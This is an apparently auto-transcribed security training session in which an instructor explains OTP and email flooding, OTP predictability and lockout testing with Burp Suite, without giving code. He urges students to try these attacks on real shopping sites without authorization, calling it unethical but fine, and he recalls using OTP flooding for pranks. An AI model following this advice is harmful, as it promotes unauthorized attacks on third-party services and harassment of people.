should get logged out, right? It should get logged out, and also we can do flooding. We can do flooding. I'm just giving you the hints. So please try this in many applications and come up with the report. Okay, flooding. So what is the meaning of flooding normally? Normal floods and
Flooding,
all.
like water.
Yeah, water will rush into all the
Yeah.
places all of the sudden, right? So here also similarly we can do OTP flooding and email flooding. OTP flooding and email flooding. So wherever you have an OTP functionality, wherever you have a OTP functionality, just check whether you can generate OTPs within seconds, or within seconds you can generate another OTP or not. Okay, here also within OTP, you can check for flooding. Even for email, you can check for email flooding. So let's say, where do you get email functionality to send? any password reset links, right? You can get the email.
Yeah,
Sandeep, I miss your voice.
yeah, actually, we'll get the reset password link.
Where else you get
Well,
emails?
hmm, uh,
Where you can get this
when we are
OTP, you know where?
log
Yeah.
signing up for the first time, it asks for the like we sign in with the normal username and like password they give,
Hmm.
and if we would like to reset the password, it said sends us the email link.
Exactly. So, Sandeep, if I ask you to do OTP flooding, forget about email flooding. Email flooding is little tricky. I will explain you that as well. So, if I ask you to do OTP flooding, what you will be doing?
I'll go to any one of the website which
Yeah.
sends the OTP, and
Okay.
I'll be like after one OTP, if after I receive one OTP, I'll be giving again
Yeah. So,
another
how you
email.
will do it? How you will do it? What are the steps involved doing it with Bob Suite?
Uh, Absurd.
Yeah. So, just
We
just
need to
imagine.
open the browser
Yeah. Yes.
in the
Correct.
proxy.
Yeah.
After opening the browser, we can log into any one of the like website.
Yeah.
Um, it asks for the like sign up or sign in.
Yes. Yes.
When we go there, uh, when we go for sign up, it asks for the options like mobile number, email address, and all.
Yeah. Yeah.
So there it will send the option of OTP
Mm-hmm.
for us,
Okay.
and by using that OTP, we
Hmm.
can like log in.
You have to capture the request and
When we
use.
need to on the
Hmm.
intruder.
Exactly. On the intercept first.
Okay,
So you have to
yeah,
capture the request, no, first. Anytime you have to capture the request first. This is
yeah.
standard.
First, intercept should be on.
Yeah.
Then we need to go for the login page.
Mm-hmm.
It will be captured here. Then we can send
Okay.
that to the intruder or repeater
Exactly.
anyway.
Exactly. Exactly. Okay. So we can do that using the repeater. Okay. We can do that using the repeater, or if you want to do it, if you want to
Mm,
do it automatically. I mean, for many requests, you can use intruder. So,
okay.
what exactly you will be using in intruder? That out of that four options, four attack types.
Mm,
So just think about that, and tomorrow this is a homework for you. Think practically, and then do this attack. If there is any OTP flooding, right? If you give number, you will be receiving all the OTPs to your mobile. Give your mobile number. Please don't give my mobile number
yeah.
there. Okay. So or someone else's. Please don't do any pranks. So there are many pranking applications. So when we were in college, we used to do a lot of pranks using this OTP flooding, just like OTP flooding and email flooding. So OTP, these are very critical applications because it's a defamation kind of vulnerability. So if there is something like that, anybody can use that to defame you, right? Defame your website. Also, that's a
So,
critical vulnerability. You're not leaking any critical information, but yeah, yeah. Please go ahead.
do we go to the like battering? Sorry, cluster bomb attack.
Why cluster bomb?
This attack uses like multiple payload sets.
Okay.
So for each defined position,
Ah.
this
I mean,
attack
we are not.
cluster
Are we
bomb will
using? We just have to, send the request again, again, again. Are what we will change in OTP request? We will click that button. We will just click that button, right? So we
yeah,
have to send the request itself. Okay, you try with all the attack types, and understand. You will understand all the attack types as well. If you do that, if it is wrong, no problem at all. No problem at all. You try to understand it practically by yourself. Okay, we will
okay,
do it practically in our next session. So
okay,
that is
sure.
one thing. So and also OTP should be random. It will, even if it is OTP is secure, but what if it is giving the same OTP again and again and again? So you have to check that randomness as well. So do it manually. Okay, do it
Okay,
manually. So check for that randomness. We will check, if there is any order, like if it is giving 1 2 3 4 once, 1 2 3 5, 1 2 3 6, 1 2 3 7. So that is a very random OTP, right? Attacker can easily guess the next OTP.
Yeah.
Okay, if that kind of vulnerabilities are there in any one of the site, so please go through any small shopping sites. You can get number of shopping sites. For them, doing security audits will become very costly. So normally they don't do. Uh, that's okay to do it, but it is not ethical. But yeah, for practice purpose, yeah, we are not harming them by any means. But okay. Okay, so you can do that. I told you like account logout policy, you see that. So how you can check account logout policy by automation using Bubs here?
Mm,
How you can check account logout policy? So it is also similar. Okay, give some 50 correct usernames
okay.
and sorry, wrong usernames and 50 passwords. Okay, just try logging them, and then on the 51st line, give the correct username and password. So if it logins for the 51st, there is no lockout policy, right?
Yeah.
Just check like that. If it is not locking you
Okay.
out, so there is vulnerability. Okay, so like that kind of vulnerabilities also you can check. So I'm giving more test cases and ideas for you, and also I will give you a big Excel sheet. Please note down the test cases first, and I will give you all the test cases that I will check personally. Okay, so my favorite checklist is there. I will give you that checklist as well. So I will go one by one on that checklist. Okay, so I will give you that
Yeah.
checklist as well. But it will go on top of your head if I give now itself. Yeah. So far, any doubts, Sandhya? Can you try this on a few testing applications? I mean, any shopping sites like Meesho, Mintra.
Yeah, I will do.
Do
And
it on more
just
applications. Yeah, you have.
a
Yeah.
request, like as you are doing, like in the session also, like I'm sharing and doing, right? So that
Yeah.
will be more interesting.
Yeah.
Rather than you do by yourself and explaining us, it takes more,
Mhm.
like lot of time to understand. If we are
Mhm.
doing that, like makes easy to understand for us. So
Definitely.
yeah,
Definitely, we'll
and
continue that. Yeah.
also waiting for the recordings of last Friday on this Monday.
This
Thursday.
Monday, actually, I have it here. In the Teams itself, can you see that? Do you have a Microsoft account? I'm
Um,
trying to upload it, but it got failed. Yesterday's recording I have, but Fridays I have to check. So Friday
okay.
we did on Zoom, and then we that happened, right? Uh,
Yeah.
Someone else joined. And yeah, I will check for that recording as well. Right.
Okay.
Thank you. Thank you for reminding me.
Yeah. Thank you.
Thank you, Sandhya. Bye bye.
Bye.